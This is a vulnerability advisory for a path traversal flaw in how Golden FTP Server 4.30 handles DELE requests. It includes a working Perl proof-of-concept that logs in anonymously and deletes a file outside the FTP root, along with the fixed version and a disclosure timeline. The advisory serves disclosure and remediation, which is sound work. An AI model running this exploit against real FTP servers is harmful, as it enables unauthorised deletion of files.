Summary
Sarid Harper has discovered a vulnerability in Golden FTP Server, which can be exploited by malicious, anonymous individuals to delete arbitrary files.
The vulnerability is caused by an error in the way FTP “DELE” requests are handled. This can be exploited to escape the FTP root and delete arbitrary files on the affected system by using the “../” character sequence.
Successful exploitation of this vulnerability requires that the “Enable full control” option is enabled.
Affected Versions
This vulnerability is confirmed in the following versions:
- Golden FTP Server 4.30 Free
- Golden FTP Server 4.30 Professional
Other versions may also be afected.
Exploit Example
use strict;
use Net::FTP
my $ftp = Net::FTP->new(“192.168.1.35″, Debug => 1) || die $@;
$ftp->login(“anonymous”, ‘anonymous@local.host’) || die $ftp->message;
# The FTP root is, via the configuration, set to C:\ftp\public
$ftp->cwd(“/public/”) || die $ftp->message;
# This deletes the file C:\bollocks.txt
$ftp->delete(“../../bollocks.txt”);
$ftp->quit;
$ftp = undef;
Resolution
Update to version 4.70 Free or Professional.
Time-line
- Vulnerability identified: 29.10.09
- Vendor informed: 11.11.09
- Vendor fix: 17.02.10
References
